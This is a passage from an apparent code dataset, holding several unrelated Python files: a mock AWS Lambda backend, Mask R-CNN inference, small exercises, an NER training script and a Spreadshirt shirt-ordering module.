codeOut.getvalue()\n result = self.convert(exec_out.strip())\n if exec_err:\n result = \"\\n\".join([exec_out.strip(), self.convert(exec_err)])\n except Exception as ex:\n errored = True\n result = '%s\\n\\n\\nException %s' % (mycode, ex)\n finally:\n codeErr.close()\n codeOut.close()\n sys.stdout = original_stdout\n sys.stderr = original_stderr\n return self.convert(result), errored\n\n def invoke(self, body, request_headers, response_headers):\n payload = dict()\n\n # Get the invocation type:\n res, errored = self._invoke_lambda(code=self.code, event=body)\n if request_headers.get(\"x-amz-invocation-type\") == \"RequestResponse\":\n encoded = base64.b64encode(res.encode('utf-8'))\n response_headers[\"x-amz-log-result\"] = encoded.decode('utf-8')\n payload['result'] = response_headers[\"x-amz-log-result\"]\n result = res.encode('utf-8')\n else:\n result = json.dumps(payload)\n if errored:\n response_headers['x-amz-function-error'] = \"Handled\"\n\n return result\n\n @classmethod\n def create_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name):\n properties = cloudformation_json['Properties']\n\n # required\n spec = {\n 'Code': properties['Code'],\n 'FunctionName': resource_name,\n 'Handler': properties['Handler'],\n 'Role': properties['Role'],\n 'Runtime': properties['Runtime'],\n }\n optional_properties = 'Description MemorySize Publish Timeout VpcConfig'.split()\n # NOTE: Not doing `properties.get(k, DEFAULT)` to avoid duplicating the\n # default logic\n for prop in optional_properties:\n if prop in properties:\n spec[prop] = properties[prop]\n\n # when ZipFile is present in CloudFormation, per the official docs,\n # the code it's a plaintext code snippet up to 4096 bytes.\n # this snippet converts this plaintext code to a proper base64-encoded ZIP file.\n if 'ZipFile' in properties['Code']:\n spec['Code']['ZipFile'] = base64.b64encode(\n cls._create_zipfile_from_plaintext_code(spec['Code']['ZipFile']))\n\n backend = lambda_backends[region_name]\n fn = backend.create_function(spec)\n return fn\n\n def get_cfn_attribute(self, attribute_name):\n from moto.cloudformation.exceptions import UnformattedGetAttTemplateException\n if attribute_name == 'Arn':\n region = 'us-east-1'\n return 'arn:aws:lambda:{0}:123456789012:function:{1}'.format(region, self.function_name)\n raise UnformattedGetAttTemplateException()\n\n @staticmethod\n def _create_zipfile_from_plaintext_code(code):\n zip_output = io.BytesIO()\n zip_file = zipfile.ZipFile(zip_output, 'w', zipfile.ZIP_DEFLATED)\n zip_file.writestr('lambda_function.zip', code)\n zip_file.close()\n zip_output.seek(0)\n return zip_output.read()\n\n\nclass EventSourceMapping(BaseModel):\n\n def __init__(self, spec):\n # required\n self.function_name = spec['FunctionName']\n self.event_source_arn = spec['EventSourceArn']\n self.starting_position = spec['StartingPosition']\n\n # optional\n self.batch_size = spec.get('BatchSize', 100)\n self.enabled = spec.get('Enabled', True)\n self.starting_position_timestamp = spec.get('StartingPositionTimestamp', None)\n\n @classmethod\n def create_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name):\n properties = cloudformation_json['Properties']\n spec = {\n 'FunctionName': properties['FunctionName'],\n 'EventSourceArn': properties['EventSourceArn'],\n 'StartingPosition': properties['StartingPosition']\n }\n optional_properties = 'BatchSize Enabled StartingPositionTimestamp'.split()\n for prop in optional_properties:\n if prop in properties:\n spec[prop] = 
properties[prop]\n return EventSourceMapping(spec)\n\n\nclass LambdaVersion(BaseModel):\n\n def __init__(self, spec):\n self.version = spec['Version']\n\n @classmethod\n def create_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name):\n properties = cloudformation_json['Properties']\n spec = {\n 'Version': properties.get('Version')\n }\n return LambdaVersion(spec)\n\n\nclass LambdaBackend(BaseBackend):\n\n def __init__(self):\n self._functions = {}\n\n def has_function(self, function_name):\n return function_name in self._functions\n\n def has_function_arn(self, function_arn):\n return self.get_function_by_arn(function_arn) is not None\n\n def create_function(self, spec):\n fn = LambdaFunction(spec)\n self._functions[fn.function_name] = fn\n return fn\n\n def get_function(self, function_name):\n return self._functions[function_name]\n\n def get_function_by_arn(self, function_arn):\n for function in self._functions.values():\n if function.function_arn == function_arn:\n return function\n return None\n\n def delete_function(self, function_name):\n del self._functions[function_name]\n\n def list_functions(self):\n return self._functions.values()\n\n def list_tags(self, resource):\n return self.get_function_by_arn(resource).tags\n\n def tag_resource(self, resource, tags):\n self.get_function_by_arn(resource).tags.update(tags)\n\n def untag_resource(self, resource, tagKeys):\n function = self.get_function_by_arn(resource)\n for key in tagKeys:\n try:\n del function.tags[key]\n except KeyError:\n pass\n # Don't care\n\n\ndef do_validate_s3():\n return os.environ.get('VALIDATE_LAMBDA_S3', '') in ['', '1', 'true']\n\n\nlambda_backends = {}\nfor region in boto.awslambda.regions():\n lambda_backends[region.name] = LambdaBackend()\n\n# Handle us forgotten regions, unless Lambda truly only runs out of US and\nfor region in ['ap-southeast-2']:\n lambda_backends[region] = LambdaBackend()\n","sub_path":"moto/awslambda/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"446246240","text":"# Copyright (c) Facebook, Inc. and its affiliates. 
All Rights Reserved.\nimport logging\nimport time\nimport os\n\nimport torch\nfrom tqdm import tqdm\n\nfrom maskrcnn_benchmark.config import cfg\nfrom maskrcnn_benchmark.data.datasets.evaluation import evaluate\nfrom ..utils.comm import is_main_process, get_world_size\nfrom ..utils.comm import all_gather\nfrom ..utils.comm import synchronize\nfrom ..utils.timer import Timer, get_time_str\nfrom .bbox_aug import im_detect_bbox_aug\n# def crop_image\nfrom maskrcnn_benchmark.structures.image_list import to_image_list\nfrom maskrcnn_benchmark.modeling.poolers import Pooler\nimport numpy as np\ndef crop_image(images,boxes):\n image = images.tensors\n bboxes = boxes.bbox.data.cpu().numpy().astype(np.int32)\n \n all_images = []\n for box in bboxes:\n minx,miny,maxx,maxy = box\n all_images.append(torch.nn.functional.interpolate(image[:,:,miny:maxy,minx:maxx], size=(4*32,15*32),mode='bilinear', align_corners=True)) \n return to_image_list(torch.cat(all_images,dim=0))\ndef compute_on_dataset(model_detect, model_retrieval, data_loader, device, timer=None):\n model_detect.eval()\n model_retrieval.eval()\n results_dict = {}\n cpu_device = torch.device(\"cpu\")\n for _, batch in enumerate(tqdm(data_loader)):\n images, targets, image_ids = batch\n \n with torch.no_grad():\n if timer:\n timer.tic()\n # output = model(images.to(device),targets,is_words=(_==0))\n output = model_detect(images.to(device),targets,is_words=True)\n if output[0].bbox.size(0)==0:\n zero_bedding = torch.zeros([0,1920]).type_as(output[0].bbox)\n output[0].add_field(\"imgs_embedding_nor\",zero_bedding)\n # output[0].add_field(\"words_embedding_nor\",retrieval_result[\"words_embedding_nor\"])\n else:\n all_images = crop_image(images,output[0])\n retrieval_result = model_retrieval(all_images.to(device),targets,is_words=True)\n output[0].add_field(\"imgs_embedding_nor\",retrieval_result[\"imgs_embedding_nor\"])\n output[0].add_field(\"words_embedding_nor\",retrieval_result[\"words_embedding_nor\"])\n # print(output,images)\n if _ == 0:\n output[0].add_field(\"y_trues\",targets[0].get_field(\"y_trues\"))\n if timer:\n if not cfg.MODEL.DEVICE == 'cpu':\n torch.cuda.synchronize()\n timer.toc()\n output = [o.to(cpu_device) for o in output]\n results_dict.update(\n {img_id: result for img_id, result in zip(image_ids, output)}\n )\n \n return results_dict\n\n\ndef _accumulate_predictions_from_multiple_gpus(predictions_per_gpu):\n all_predictions = all_gather(predictions_per_gpu)\n if not is_main_process():\n return\n # merge the list of dicts\n predictions = {}\n for p in all_predictions:\n predictions.update(p)\n # convert a dict where the key is the index in a list\n image_ids = list(sorted(predictions.keys()))\n if len(image_ids) != image_ids[-1] + 1:\n logger = logging.getLogger(\"maskrcnn_benchmark.inference\")\n logger.warning(\n \"Number of images that were gathered from multiple processes is not \"\n \"a contiguous set. 
Some images might be missing from the evaluation\"\n )\n\n # convert to a list\n predictions = [predictions[i] for i in image_ids]\n return predictions\n\n\ndef inference(\n model_detect,\n model_retrieval,\n data_loader,\n dataset_name,\n iou_types=(\"bbox\",),\n rec_type = \"ctc\",\n box_only=False,\n device=\"cuda\",\n expected_results=(),\n expected_results_sigma_tol=4,\n output_folder=None,\n):\n\n logger = logging.getLogger(\"maskrcnn_benchmark.inference\")\n dataset = data_loader.dataset\n logger.info(\"Start evaluation on {} dataset({} images).\".format(dataset_name, len(dataset)))\n\n extra_args = dict(\n box_only=box_only,\n iou_types=iou_types,\n rec_type=rec_type,\n expected_results=expected_results,\n expected_results_sigma_tol=expected_results_sigma_tol,\n )\n\n # load predictions if exists\n prediction_file = os.path.join(output_folder, 'predictions.pth')\n # if os.path.isfile(prediction_file):\n # predictions = torch.load(prediction_file)\n # logger.info(\"Found prediction results at {}\".format(prediction_file))\n\n # return evaluate(dataset=dataset,\n # predictions=predictions,\n # output_folder=output_folder,\n # **extra_args)\n\n # convert to a torch.device for efficiency\n device = torch.device(device)\n num_devices = get_world_size()\n total_timer = Timer()\n inference_timer = Timer()\n total_timer.tic()\n predictions = compute_on_dataset(model_detect, model_retrieval, data_loader, device, inference_timer)\n # wait for all processes to complete before measuring the time\n synchronize()\n total_time = total_timer.toc()\n total_time_str = get_time_str(total_time)\n logger.info(\n \"Total run time: {} ({} s / img per device, on {} devices)\".format(\n total_time_str, total_time * num_devices / len(dataset), num_devices\n )\n )\n total_infer_time = get_time_str(inference_timer.total_time)\n logger.info(\n \"Model inference time: {} ({} s / img per device, on {} devices)\".format(\n total_infer_time,\n inference_timer.total_time * num_devices / len(dataset),\n num_devices,\n )\n )\n\n predictions = _accumulate_predictions_from_multiple_gpus(predictions)\n if not is_main_process():\n return\n\n if output_folder:\n torch.save(predictions, os.path.join(output_folder, \"predictions.pth\"))\n\n return evaluate(dataset=dataset,\n predictions=predictions,\n output_folder=output_folder,\n **extra_args)\n","sub_path":"maskrcnn_benchmark/engine/inference_two_net.py","file_name":"inference_two_net.py","file_ext":"py","file_size_in_byte":6029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"363956131","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 27 09:18:14 2019\n\n@author: tanvirkaur\n\"\"\"\n\n#time complexity = O(n)\n#Space complexity = O(1)\n#LeetCode acceptance = Yes\n\nclass Solution:\n def rob(self, nums: List[int]) -> int:\n # base case\n if not nums:\n return 0\n Notchosen = 0\n chosen = nums[0]\n for i in range(1,len(nums)):\n chosen, Notchosen = nums[i] + Notchosen, max(Notchosen, chosen)\n return max(chosen, Notchosen)","sub_path":"HouseRobber3.py","file_name":"HouseRobber3.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"229068897","text":"# Help hairdresser advertise cheapest haircuts\n\n# list of all hairstyles offered at hairdresser\nhairstyles = [\"bouffant\", \"pixie\", \"dreadlocks\", \"crew\", \"bowl\", \"bob\", \"mohawk\", \"flattop\"]\n\n# list of prices associated with 
hairstyles listed above\nprices = [30, 25, 40, 20, 20, 35, 50, 35]\n\n# number of haircuts completed the previous week by hairstyle\nlast_week = [2, 3, 5, 8, 4, 4, 6, 2]\n\n# set price to 0\ntotal_price = 0\n\n# reiterate through all prices to print the sum\nfor price in prices:\n total_price += price\n print(total_price)\n\n# determine average price of a haircut\naverage_price = total_price / len(prices)\n\nprint(\"Average Haircut Price: \" + str(average_price))\n\n# reduce the price of all haircuts by $5\nnew_prices = [price - 5 for price in prices]\n\nprint(new_prices)\n\n# set total_revenue to 0\ntotal_revenue = 0\n\n# reiterate through new_prices to determine revenue generated the previous week\nfor i in range(0, len(hairstyles)):\n tot_rev = prices[i] * last_week[i]\n total_revenue += tot_rev\n print(\"Total Revenue: \" + str(total_revenue))\n\n# determine average daily revenue based on total_revenue\naverage_daily_revenue = total_revenue / 7\n\n# determine all haircuts under $30 based on list enumeration created for new_prices\ncuts_under_30 = [hairstyles[i] for i in range(0, len(new_prices - 1)) if new_prices[i] < 30]\n\n# print all haircuts under $30\nprint(cuts_under_30)\n","sub_path":"cheapest_haircut_challenge.py","file_name":"cheapest_haircut_challenge.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"144374234","text":"from __future__ import print_function\n\nimport numpy as np\nfrom dynamic_graph.sot_talos_balance.joint_position_controller import (\n JointPositionController,\n)\n\ncontroller = JointPositionController(\"ciao\")\n\n# print(\"Commands:\")\n# print(controller.commands())\n\nprint(\"\\nSignals (at creation):\")\ncontroller.displaySignals()\n\nN_JOINTS = 2\n\ncontroller.Kp.value = np.array(N_JOINTS * [10.0])\ncontroller.state.value = np.array([0.0] * 6 + N_JOINTS * [0.0])\ncontroller.qDes.value = np.array(N_JOINTS * [1.0])\ncontroller.dqDes.value = np.array(N_JOINTS * [0.0])\n\ncontroller.init(N_JOINTS)\n\ncontroller.dqRef.recompute(1)\n\nprint(\"\\nKp: %s\" % (controller.Kp.value,))\nprint(\"\\nq: %s\" % (controller.state.value,))\nprint(\"qDes: %s\" % (controller.qDes.value,))\nprint(\"dqDes: %s\" % (controller.dqDes.value,))\n\nprint(\"\\ndqRef: %s\" % (controller.dqRef.value,))\n","sub_path":"tests/python/test_control.py","file_name":"test_control.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"544389939","text":"#!/usr/bin/env python\nimport os\nimport sys\nimport xml.dom.minidom\nfrom xml.dom.minidom import parse\n\n#open a directory\ndirectory = os.getcwd()\npath = '../islandora/modsCollections/'\ndirs = os.listdir(path)\n\n\n\nfor files in dirs:\n\tif files.endswith(\".xml\"):\n\t\t#print(\"{} is a file in {}\".format(files, directory))\n\t\tinfile = open(\"../islandora/modsCollections/\" + files, \"r\", encoding=\"UTF-8\")\n\t\tdatasource = xml.dom.minidom.parse(infile)\n\t\tdom_in = datasource\n\t\trecords = dom_in.getElementsByTagName(\"mods\")\n\t\tfor record in records:\n\t\t\tidentifier = record.getElementsByTagName(\"identifier\")[0].firstChild.nodeValue\n\t\t\toutfile = open(\"../islandora/modsCollections/modsRecords/\" + str(identifier) + \".xml\", \"wb\")\n\t\t\tprint(\"Writing \" + identifier.replace('\"', \"\") + 
\".xml...\")\n\t\t\toutfile.write(record.toprettyxml(encoding='UTF-8'))\n\t\t\toutfile.close()\n\n","sub_path":"osdir.py","file_name":"osdir.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"288689384","text":"import unittest\nimport pyfilter.utils.utils as helps\nfrom scipy.stats import wishart\nimport numpy as np\nfrom scipy.optimize import minimize\nfrom time import time\n\n\nclass Tests(unittest.TestCase):\n def test_OuterProduct(self):\n a = np.random.normal(size=(3, 3))\n b = np.random.normal(size=(3, 3))\n\n true = a.dot(b.dot(a.T))\n est = helps.outer(a, b)\n\n assert np.allclose(true, est)\n\n def test_Dot(self):\n a = np.random.normal(size=(2, 2))\n b = np.random.normal(size=2)\n \n trueval = a.dot(b)\n\n est = helps.dot(a, b)\n\n assert np.allclose(trueval, est)\n\n def test_Outerv(self):\n a = np.random.normal(size=2)\n b = np.random.normal(size=2)\n\n trueval = a[:, None].dot(b[None, :])\n\n est = helps.outerv(a, b)\n\n assert np.allclose(est, trueval)\n\n def test_ExpandDims(self):\n a = np.random.normal(size=(3, 3))\n b = np.random.normal(size=(3, 3, 500, 500))\n\n newa = helps.expanddims(a, b.ndim)\n\n assert newa.shape == (3, 3, 1, 1)\n\n def test_mdot(self):\n a = np.random.normal(size=(3, 3))\n b = np.empty((*a.shape, 300, 300))\n b[:, :] = helps.expanddims(a, b.ndim)\n\n est = helps.mdot(a, b)\n\n assert np.allclose(est, helps.expanddims(a.dot(a), b.ndim))\n\n def test_CustomCholesky(self):\n cov = wishart(3, scale=np.eye(3)).rvs()\n\n extendedcov = np.empty((*cov.shape, 300, 300))\n extendedcov[:, :] = helps.expanddims(cov, extendedcov.ndim)\n\n choleskied = np.linalg.cholesky(cov)\n\n assert np.allclose(helps.expanddims(choleskied, extendedcov.ndim), helps.customcholesky(extendedcov))\n\n def test_Outerm(self):\n a = np.random.normal(size=(3, 3))\n b = np.random.normal(size=(3, 3))\n\n trueouter = a.dot(b.T)\n\n calcouter = helps.outerm(a, b)\n\n assert np.allclose(trueouter, calcouter)\n\n def test_BFGS(self):\n for i in range(500):\n x = np.random.normal()\n m = np.random.normal()\n\n func = lambda u: -np.exp(-(u - m) ** 2 / 2)\n\n trueanswer = minimize(func, x)\n approximate = helps.bfgs(func, x, tol=1e-8)\n\n assert (np.abs(m - approximate.x) < 1e-7)\n\n def test_BFGS_ParallellOptimization(self):\n x = np.random.normal(size=(1, 5000))\n m = np.random.normal()\n\n func = lambda u: -np.exp(-(u - m) ** 2 / 2)\n\n truestart = time()\n trueanswers = np.array([minimize(func, x[:, i]).x for i in range(x.shape[-1])])\n truetime = time() - truestart\n\n approxstart = time()\n approximate = helps.bfgs(func, x, tol=1e-7)\n approxtime = time() - approxstart\n\n print('naive: {:.3f}, parallel: {:.3f}, speedup: {:.2f}x'.format(truetime, approxtime, truetime / approxtime))\n\n assert (np.abs(approximate.x - m) < 1e-7).mean() > 0.95 and truetime / approxtime > 2","sub_path":"test/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"76880068","text":"import torch\r\n\r\ndata = torch.tensor([[3,4],[5,6],[7,8],[9,8],[6,5]])\r\nlabel = torch.Tensor([0,0,1,0,1])\r\ncenter = torch.tensor([[1,1],[2,2]])\r\n\r\ncenter_exp = center.index_select(dim=0,index=label.long())\r\nprint(center_exp)\r\n\r\ncount = torch.histc(label,bins=2,min=0,max=1)\r\nprint(count)\r\n\r\ncount_exp = count.index_select(dim=0,index=label.long())\r\nprint(count_exp)\r\n\r\ncenter_loss = 
torch.sum(torch.div(torch.sqrt(torch.sum(torch.pow(data-center_exp,torch.tensor(2)),dim=1).float()),count_exp))\r\nprint(center_loss)\r\n","sub_path":"24 网络优化/test_20210323/test02.py","file_name":"test02.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"152458761","text":"from pylons import app_globals as g, tmpl_context as c\nimport sha, base64, time, re, urllib, socket\nimport ImageFont\nfrom r2.lib.wrapped import Templated\nfrom r2.lib.pages import LinkInfoPage\nfrom r2.models import *\nfrom httplib import HTTPConnection\nfrom urlparse import urlparse\nfrom BeautifulSoup import BeautifulStoneSoup\n\ncolors = ((\"black\",2), (\"white\", 1), (\"navy\",4), (\"heather\",231), (\"red\",5))\nsizes = ((\"small\",2), (\"medium\",3), (\"large\",4), (\"xlarge\", 5), (\"xxlarge\",6))\n\narticles = {\"women\":\n dict(black = 4604645,\n heather = 4604654,\n navy = 4737035,\n red = 4604670,\n white = 4604694,\n ),\n \"men\" :\n dict(black = 4589785,\n heather = 4599883,\n navy = 4737029,\n red = 4589762,\n white = 4589259,\n ) }\n\n\nspreadshirt_url = urlparse(g.spreadshirt_url)\ntry:\n test_font = ImageFont.truetype(g.spreadshirt_test_font,\n int(g.spreadshirt_min_font))\nexcept IOError:\n test_font = None\n\nword_re = re.compile(r\"\\w*\\W*\", re.UNICODE)\ndef layout_text(text, max_width = None):\n if test_font:\n words = list(reversed(word_re.findall(text)))\n lines = [\"\"]\n while words:\n word = words.pop()\n w = test_font.getsize(lines[-1] + word)[0]\n if w < max_width:\n lines[-1] += word\n else:\n lines.append(word)\n lines = [x.strip() for x in filter(None, lines)]\n return all(test_font.getsize(x)[0] < max_width for x in lines), lines\n return None, []\n\ndef spreadshirt_validation(s):\n t = str(int(time.time()))\n return t, base64.b64encode(sha.new(s+t+g.spreadshirt_vendor_id).digest())\n\ndef shirt_request(link, color, style, size, quantity):\n article = articles.get(style, {}).get(color)\n size = dict(sizes).get(size)\n color = dict(colors).get(color)\n\n # load up previous session id (if there was one)\n sessionid = c.cookies.get(\"spreadshirt\")\n sessionid = sessionid.value if sessionid else \"\"\n\n if link and color and size and quantity and article:\n # try to layout the text\n text = ShirtPane.make_text(link)\n if text:\n author = Account._byID(link.author_id, True)\n request_dict = dict(color = color,\n quantity = quantity,\n sessionId = sessionid,\n size = size,\n article_id = article)\n for i, t in enumerate(text):\n request_dict[\"textrow_%d\" % (i+1)] = t\n request_dict[\"textrow_6\"] = \"submitted by %s\" % author.name\n request_dict[\"textrow_7\"] = link._date.strftime(\"%B %e, %Y\")\n text.extend([request_dict[\"textrow_6\"], request_dict[\"textrow_7\"]])\n\n t, code = spreadshirt_validation(\"\".join(text))\n request_dict['timestamp'] = t\n request_dict['hash'] = code\n\n params = urllib.urlencode(request_dict)\n headers = {\"Content-type\": \"application/x-www-form-urlencoded\",\n \"Accept\": \"text/plain\"}\n data = None\n try:\n conn = HTTPConnection(spreadshirt_url.hostname)\n conn.request(\"POST\", spreadshirt_url.path, params, headers)\n response = conn.getresponse()\n if int(response.status) == 200:\n data = BeautifulStoneSoup(response.read())\n conn.close()\n except socket.error:\n return\n\n if data:\n if not data.find(\"error\"):\n session_id = data.sessionid.contents[0]\n data = data.basketurl.contents[0]\n # set session id before redirecting\n 
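                    # (The id saved here is what shirt_request() reads back at the
                    # top via c.cookies.get("spreadshirt") and re-posts as the
                    # sessionId field, so repeat requests reuse the same basket.)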
c.cookies.add(\"spreadshirt\", session_id)\n else:\n g.log.error(\"Spreadshirt Error:\\n\" )\n g.log.error(data.prettify() + '\\n')\n g.log.error(\"POST and params: \" + g.spreadshirt_url)\n g.log.error(params)\n data = None\n\n return data\n\n\nclass ShirtPage(LinkInfoPage):\n extension_handling= False\n additional_css = \"spreadshirt.css\"\n def __init__(self, *a, **kw):\n kw['show_sidebar'] = False\n LinkInfoPage.__init__(self, *a, **kw)\n\n def content(self):\n return self.content_stack((self.link_listing,\n ShirtPane(self.link)))\n\nclass ShirtPane(Templated):\n default_color = \"black\"\n default_size = \"large\"\n default_style = \"men\"\n\n colors = [x for x, y in colors]\n styles = (\"men\", \"women\")\n sizes = [x for x, y in sizes]\n\n def __init__(self, link, **kw):\n Templated.__init__(self, link = link, text = self.make_text(link), **kw)\n\n @classmethod\n def make_text(cls, link):\n fit, text = layout_text(link.title,\n int(g.spreadshirt_max_width))\n if len(text) > 5 or not fit:\n text = []\n return text\n","sub_path":"virtual/libs/spreadshirt.py","file_name":"spreadshirt.py","file_ext":"py","file_size_in_byte":5187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"197038307","text":"\"\"\"\nThis Script, creates the property file for different training data files, then trains a CRF and tests it on 2 different test sets testA, testB.\n\"\"\"\nimport subprocess\nimport re\n\n\ndef test_on_testB(numberOfSeeds):\n ''' Testing the trained crf on testB '''\n outputfile = open('/Users/sepidehmesbah/Downloads/ner-crf-master/evaluation/aaaembedingclustering_testBoutputs.txt', 'a')\n for iteration in range(0, 10):\n command='java -cp /Users/sepidehmesbah/Downloads/stanford-ner-2016-10-31/stanford-ner.jar edu.stanford.nlp.ie.crf.CRFClassifier -loadClassifier /Users/sepidehmesbah/Downloads/ner-crf-master/evaluation/embedingclustering_splitted'+ str(numberOfSeeds) + '_' + str(iteration) +'.ser.gz -testFile /Users/sepidehmesbah/Downloads/ner-crf-master/evaluation/X_testB_50_manually_splitted3.tsv'\n p = subprocess.call(command,\n stdout=outputfile,\n stderr=subprocess.STDOUT, shell=True)\n outputfile.close()\n\n#run_command('java -cp /Users/sepidehmesbah/Downloads/stanford-ner-2016-10-31/stanford-ner.jar edu.stanford.nlp.ie.crf.CRFClassifier -loadClassifier /Users/sepidehmesbah/Downloads/stanford-ner-2016-10-31/seednames_splitted2_1.tsv.ser.gz -testFile /Users/sepidehmesbah/Downloads/ner-crf-master/evaluation/X_testB_50_manually_splitted.tsv')\n\n\n###############\n\ndef training_austenprop(numberOfSeeds):\n ''' Training the CRF and testing on TestA '''\n outputfile=open('/Users/sepidehmesbah/Downloads/ner-crf-master/evaluation/aaaembedingclustering__testAoutputs.txt','a')\n for iteration in range(0, 10):\n\n command = 'java -cp /Users/sepidehmesbah/Downloads/stanford-ner-2016-10-31/stanford-ner.jar edu.stanford.nlp.ie.crf.CRFClassifier -prop /Users/sepidehmesbah/Downloads/ner-crf-master/prop_files/austen' + str(numberOfSeeds) + '_' + str(iteration) + '.prop'\n\n p = subprocess.call(command,\n stdout=outputfile,\n stderr=subprocess.STDOUT, shell=True)\n\n\n\n\ndef create_austenprop(numberOfSeeds):\n ''' Generating the property files'''\n outputfile = open('/Users/sepidehmesbah/Downloads/ner-crf-master/evaluation/austen.prop', 'r')\n text=outputfile.read()\n print(text)\n for iteration in range(0, 10):\n modifiedpath='trainFile=/Users/sepidehmesbah/Downloads/ner-crf-master/evaluation_files/embedingclustering_splitted' + 
str(numberOfSeeds) + '_' + str(iteration) + '.txt'\n modifiedpathtest = 'testFile=/Users/sepidehmesbah/Downloads/ner-crf-master/evaluation_files/embedingclustering_test_splitted' + str(numberOfSeeds) + '_' + str(iteration) + '.txt'\n serializeTo='serializeTo=seednames__splitted' + str(numberOfSeeds) + '_' + str(iteration) +'.ser.gz'\n edited = re.sub(r'trainFile.*?txt', modifiedpath, text, flags=re.DOTALL)\n edited = re.sub(r'testFile.*?txt', modifiedpathtest, edited, flags=re.DOTALL)\n edited = re.sub(r'serializeTo.*?gz', serializeTo, edited, flags=re.DOTALL)\n print(edited)\n text_file = open('/Users/sepidehmesbah/Downloads/ner-crf-master/prop_files/austen'+ str(numberOfSeeds) + '_' + str(iteration) + '.prop', 'w')\n text_file.write(edited)\n text_file.close()\n\n# create_austenprop(2)\n# create_austenprop(5)\n# create_austenprop(10)\n# create_austenprop(25)\n# create_austenprop(50)\n# create_austenprop(100)\n# training_austenprop(2)\n# training_austenprop(5)\n# training_austenprop(10)\n# training_austenprop(25)\n# training_austenprop(50)\n# training_austenprop(100)\ntest_on_testB(2)\ntest_on_testB(5)\ntest_on_testB(10)\ntest_on_testB(25)\ntest_on_testB(50)\ntest_on_testB(100)\n\n","sub_path":"ner_training.py","file_name":"ner_training.py","file_ext":"py","file_size_in_byte":3619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"542452712","text":"# See LICENSE for licensing information.\n#\n# Copyright (c) 2016-2020 Regents of the University of California and The Board\n# of Regents for the Oklahoma Agricultural and Mechanical College\n# (acting for and on behalf of Oklahoma State University)\n# All rights reserved.\n#\nfrom globals import OPTS\n\nclass _pins:\n def __init__(self, pin_dict):\n # make the pins elements of the class to allow \".\" access.\n # For example: props.bitcell.cell_6t.pin.bl = \"foobar\"\n for k,v in pin_dict.items():\n self.__dict__[k] = v\n\nclass _cell:\n def __init__(self, pin_dict):\n pin_dict.update(self._default_power_pins())\n self._pins = _pins(pin_dict)\n\n @property\n def pin(self):\n return self._pins\n\n def _default_power_pins(self):\n return { 'vdd' : 'vdd', 'gnd' : 'gnd' }\n\nclass _mirror_axis:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\nclass _bitcell:\n def __init__(self, mirror, split_wl, cell_s8_6t, cell_6t, cell_1rw1r, cell_1w1r):\n self.mirror = mirror\n self.split_wl = split_wl\n self._s8_6t = cell_s8_6t\n self._6t = cell_6t\n self._1rw1r = cell_1rw1r\n self._1w1r = cell_1w1r\n\n def _default():\n axis = _mirror_axis(True, False)\n\n cell_s8_6t = _cell({'bl' : 'bl0',\n 'br' : 'bl1',\n 'wl': 'wl'})\n\n cell_6t = _cell({'bl' : 'bl',\n 'br' : 'br',\n 'wl' : 'wl'})\n\n cell_1rw1r = _cell({'bl0' : 'bl0',\n 'br0' : 'br0',\n 'bl1' : 'bl1',\n 'br1' : 'br1',\n 'wl0' : 'wl0',\n 'wl1' : 'wl1'})\n\n cell_1w1r = _cell({'bl0' : 'bl0',\n 'br0' : 'br0',\n 'bl1' : 'bl1',\n 'br1' : 'br1',\n 'wl0' : 'wl0',\n 'wl1' : 'wl1'})\n\n return _bitcell(cell_s8_6t=cell_s8_6t,\n cell_6t=cell_6t,\n cell_1rw1r=cell_1rw1r,\n cell_1w1r=cell_1w1r,\n split_wl = [],\n mirror=axis)\n\n @property\n def cell_s8_6t(self):\n return self._s8_6t\n\n @property\n def cell_6t(self):\n return self._6t\n\n @property\n def cell_1rw1r(self):\n return self._1rw1r\n\n @property\n def cell_1w1r(self):\n return self._1w1r\n\n\nclass _dff:\n def __init__(self, use_custom_ports, custom_port_list, custom_type_list, clk_pin):\n self.use_custom_ports = use_custom_ports\n self.custom_port_list = custom_port_list\n 
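        # A minimal usage sketch (hypothetical values, not from a real tech
        # file): a technology override could instantiate this container as
        #     dff = _dff(use_custom_ports=True,
        #                custom_port_list=["D", "Q", "CLK", "VPWR", "VGND"],
        #                custom_type_list=["INPUT", "OUTPUT", "INPUT", "POWER", "GROUND"],
        #                clk_pin="CLK")
        # where custom_type_list[i] gives the direction of custom_port_list[i].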
